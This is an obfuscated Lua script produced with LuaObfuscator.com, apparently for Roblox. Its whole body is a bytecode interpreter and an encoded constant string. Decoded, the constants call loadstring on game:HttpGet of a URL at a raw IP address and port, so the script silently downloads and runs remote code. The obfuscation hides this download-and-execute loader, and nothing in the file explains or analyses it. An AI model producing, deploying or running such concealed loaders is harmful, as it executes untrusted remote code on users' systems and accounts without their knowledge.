--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v89,v19);v19=nil;v110=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=0 + 0 ;local v91;while true do if (v90==(877 -(282 + 595))) then v91=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((1146 -526) -(555 + 64)))) + ((1710 -778) -(857 + 74)))) ;return v91-(v91%(569 -(367 + (551 -(87 + 263))))) ;end end else local v92=(297 -(67 + 113)) -(32 + 85) ;local v93;while true do if (v92==(0 + 0 + 0)) then v93=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v93 + v93))>=v93) and (2 -(2 -1))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (1017 -761)) + v35 ;end local function v23() local v37=952 -(802 + 150) ;local v38;local v39;local v40;local v41;while true do if (v37==(2 -(1 -0))) then return (v41 * 16777216) + (v40 * (118879 -53343)) + (v39 * 256) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + (11 -7) ;v37=1 + 0 ;end end end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1188 -(1069 + 118))) then v45=(861 -(814 + 45)) -1 ;v46=(v20(v44,1 -0 ,4 + 16 ) * (2^(56 -24))) + v43 ;v42=4 -2 ;end if (v42==(1 + 1 + 0)) then v47=v20(v44,(287 + 525) -(368 + (1308 -(261 + 624))) ,97 -66 );v48=((v20(v44,50 -(10 + 8) )==(3 -2)) and  -(443 -(416 + 26))) or (3 -2) ;v42=2 + 1 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1;end if (v42==(441 -(145 + 293))) then if (v47==(430 -(44 + 386))) then if (v46==0) then return v48 * (1486 -(998 + 488)) ;else local v125=0 + 0 ;while true do if (v125==0) then v47=1 + 0 ;v45=772 -(201 + (1014 -443)) ;break;end end end elseif (v47==((4265 -(1020 + 60)) -(116 + 1022))) then return ((v46==(1423 -(630 + 793))) and (v48 * ((4 -3)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-((12653 -8919) -2711) ) * (v45 + (v46/(2^(184 -(624 -492))))) ;end end end local function v25(v49) local v50=0 + 0 + 0 ;local v51;local v52;while true do if (v50==(9 -6)) then return v6(v52);end if ((1748 -(760 + 987))==v50) then v51=v3(v16,v18,(v18 + v49) -(1914 -((4043 -2254) + (1537 -(447 + 966)))) );v18=v18 + v49 ;v50=768 -(745 + 21) ;end if (v50==(0 + 0)) then v51=nil;if  not v49 then local v118=0 -0 ;while true do if (v118==(0 -0)) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=1 + (0 -0) ;end if (v50==2) then v52={};for v112=1056 -(87 + 968) , #v51 do v52[v112]=v2(v1(v3(v51,v112,v112)));end v50=13 -10 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103~=0) then else local v119=(function() return 0;end)();local v120=(function() return;end)();while true do if (v119==(0 -0)) then v120=(function() return 0 -0 ;end)();while true do if ((1701 -(1419 + 281))==v120) then v103=(function() return 1;end)();break;end if ((0 -0)~=v120) then else local v129=(function() return 74 -(71 + 3) ;end)();while true do if (0~=v129) then else v94=(function() return 0;end)();v95=(function() return nil;end)();v129=(function() return 1 + 0 ;end)();end if (v129==(2 -1)) then v120=(function() return 1 -0 ;end)();break;end end end end break;end end end if (v103~=(242 -(187 + 54))) then else local v121=(function() return 780 -(162 + 618) ;end)();while true do if (v121==0) then while true do if (v94==0) then v95=(function() return v96();end)();if (v97(v95, #"/", #"}")~=(0 + 0)) then else local v130=(function() return 0;end)();local v131=(function() return;end)();local v132=(function() return;end)();local v133=(function() return;end)();while true do if (v130~=(2 + 1)) then else if (v97(v132, #"nil", #"xnx")~= #":") then else v133[ #".com"]=(function() return v100[v133[ #".com"]];end)();end v101[v102]=(function() return v133;end)();break;end if (1==v130) then local v170=(function() return 0 -0 ;end)();while true do if (v170==0) then v133=(function() return {v98(),v98(),nil,nil};end)();if (v131==(0 -0)) then local v182=(function() return 0 + 0 ;end)();local v183=(function() return;end)();while true do if (v182~=0) then else v183=(function() return 0;end)();while true do if (0~=v183) then else v133[ #"91("]=(function() return v98();end)();v133[ #"0836"]=(function() return v98();end)();break;end end break;end end elseif (v131== #"/") then v133[ #"-19"]=(function() return v99();end)();elseif (v131==2) then v133[ #"xnx"]=(function() return v99() -((1638 -(1373 + 263))^16) ;end)();elseif (v131== #"91(") then local v189=(function() return 1000 -(451 + 549) ;end)();local v190=(function() return;end)();while true do if (v189~=0) then else v190=(function() return 0 + 0 ;end)();while true do if (v190~=0) then else v133[ #"91("]=(function() return v99() -(2^16) ;end)();v133[ #".dev"]=(function() return v98();end)();break;end end break;end end end v170=(function() return 1;end)();end if (v170~=(1 -0)) then else v130=(function() return 2 -0 ;end)();break;end end end if (v130~=(1384 -(746 + 638))) then else local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if ((0 + 0)~=v171) then else v172=(function() return 0;end)();while true do if (v172==(1 -0)) then v130=(function() return 342 -(218 + 123) ;end)();break;end if (v172==0) then local v184=(function() return 0;end)();while true do if (v184==(1582 -(1535 + 46))) then v172=(function() return 1;end)();break;end if (v184~=0) then else v131=(function() return v97(v95,2 + 0 , #"-19");end)();v132=(function() return v97(v95, #".com",6);end)();v184=(function() return 1 + 0 ;end)();end end end end break;end end end if (2==v130) then if (v97(v132, #"[", #"}")~= #".") then else v133[2]=(function() return v100[v133[2]];end)();end if (v97(v132,2,562 -(306 + 254) )~= #",") then else v133[ #"xnx"]=(function() return v100[v133[ #"gha"]];end)();end v130=(function() return 1 + 2 ;end)();end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end end end;end)();local v54=(function() return function(v104,v105,v106) local v107=(function() return 0 -0 ;end)();while true do if ((1467 -(899 + 568))==v107) then local v122=(function() return 0 + 0 ;end)();while true do if (v122==(0 -0)) then v104[v105-#"/" ]=(function() return v106();end)();return v104,v105,v106;end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"|",v59 do local v69=(function() return 290 -(60 + 230) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if ((573 -(426 + 146))~=v69) then else v72=(function() return nil;end)();while true do if (v70==(0 + 0)) then local v126=(function() return 1456 -(282 + 1174) ;end)();while true do if (v126~=1) then else v70=(function() return 812 -(569 + 242) ;end)();break;end if (v126==(0 -0)) then v71=(function() return v21();end)();v72=(function() return nil;end)();v126=(function() return 1 + 0 ;end)();end end end if (v70==(1025 -(706 + 318))) then if (v71== #".") then v72=(function() return v21()~=(1251 -(721 + 530)) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"91(") then else v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end end break;end if (v69==0) then v70=(function() return 1271 -(945 + 326) ;end)();v71=(function() return nil;end)();v69=(function() return 2 -1 ;end)();end end end v58[ #"xnx"]=(function() return v21();end)();for v73= #".",v23() do FlatIdent_17196,Descriptor,v21,v20,v22,v23,v60,v55,v73=(function() return v53(FlatIdent_17196,Descriptor,v21,v20,v22,v23,v60,v55,v73);end)();end for v74= #".",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[(2 -1) + (0 -0) ];local v66=v62[702 -(271 + 429) ];local v67=v62[3 + 0 ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=1501 -((2959 -(1126 + 425)) + 92) ;local v80= -(1087 -(461 + 625));local v81={};local v82={...};local v83=v12("#",...) -1 ;local v84={};local v85={};for v108=0,v83 do if (v108>=v77) then v81[v108-v77 ]=v82[v108 + (1289 -(993 + 295)) ];else v85[v108]=v82[v108 + 1 + 0 ];end end local v86=(v83-v77) + (1172 -(418 + 753)) ;local v87;local v88;while true do local v109=0 + (405 -(118 + 287)) ;while true do if (v109==(1 + 0)) then if ((v88<=(3 + 4)) or (2082==4773)) then if (v88<=(1 + 2)) then if (v88<=((2077 -1547) -(406 + 123))) then if (v88==(1769 -(1749 + 20))) then do return;end else local v134=v87[1123 -(118 + 1003) ];v85[v134]=v85[v134](v13(v85,v134 + 1 + 0 ,v80));end elseif ((v88==(1324 -(1249 + 73))) or (1421>=2104)) then local v136=v87[1 + 1 ];v85[v136]=v85[v136](v13(v85,v136 + (1146 -(466 + 679)) ,v80));else local v138=v87[4 -2 ];local v139=v85[v87[3]];v85[v138 + (2 -1) ]=v139;v85[v138]=v139[v87[1904 -(106 + 1794) ]];end elseif ((1812<=3249) and (v88<=5)) then if (v88>4) then v85[v87[1 + 1 ]]={};else v85[v87[1 + (2 -1) ]]();end elseif ((3244>1055) and (v88==6)) then v85[v87[2]]={};else local v145=v87[5 -(380 -(142 + 235)) ];local v146=v85[v87[(31 -24) -4 ]];v85[v145 + (115 -(4 + 110)) ]=v146;v85[v145]=v146[v87[588 -(57 + 527) ]];end elseif (v88<=(1438 -(41 + 1386))) then if (v88<=((25 + 87) -((994 -(553 + 424)) + 86))) then if (v88>(6 + 2)) then v85[v87[3 -1 ]]=v87[8 -5 ];else do return;end end elseif (v88==(176 -(122 + 44))) then v85[v87[2 -0 ]]=v87[9 -(10 -4) ];else local v154=0 + 0 ;local v155;local v156;local v157;local v158;while true do if (v154==1) then v80=(v157 + v155) -(1 + 0) ;v158=0 + 0 ;v154=3 -1 ;end if ((v154==(65 -(30 + 35))) or (3313<=1778)) then v155=v87[2 + 0 + 0 ];v156,v157=v78(v85[v155](v13(v85,v155 + 1 ,v87[3])));v154=1258 -(1043 + 214) ;end if (v154==(7 -5)) then for v174=v155,v80 do v158=v158 + (1213 -(323 + 889)) ;v85[v174]=v156[v158];end break;end end end elseif (v88<=((20 + 14) -21)) then if ((1623<=1957) and (v88>(592 -(154 + 207 + 219)))) then v85[v87[322 -(53 + 267) ]]=v64[v87[1 + 2 ]];else local v161=v87[2 + 0 ];local v162,v163=v78(v85[v161](v13(v85,v161 + (414 -(15 + 398)) ,v87[985 -(18 + 964) ])));v80=(v163 + v161) -((6 -3) -2) ;local v164=0 + 0 ;for v167=v161,v80 do local v168=(0 -0) + 0 ;while true do if (v168==(850 -(20 + 830))) then v164=v164 + (2 -1) + 0 ;v85[v167]=v162[v164];break;end end end end elseif (v88==(140 -(116 + 10))) then v85[v87[1 + 1 ]]=v64[v87[3]];else v85[v87[740 -(542 + 196) ]]();end v79=v79 + (1 -0) ;break;end if ((0 + 0)==v109) then v87=v75[v79];v88=v87[1 + 0 + 0 ];v109=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574039A3Q00682Q74703A2Q2F3130392E37312E3234302E3233353A333931302F6170692F72756E2F65794A705A434936496A4E6A595463784F47497A4C544D355A574D744E4455784D7930354D444E6A4C5452694E5467785A6A4A6D5A6D45304E434973496D7470626D51694F694A736232466B5A5849694C434A3261584E31595777694F6E7369615751694F694A31626D6C325A584A7A5957776966583000094Q00067Q00120E000100013Q00120E000200023Q00200300020002000300120A000400044Q000B000200044Q000100013Q00022Q00040001000100012Q00083Q00017Q00",v9(),...);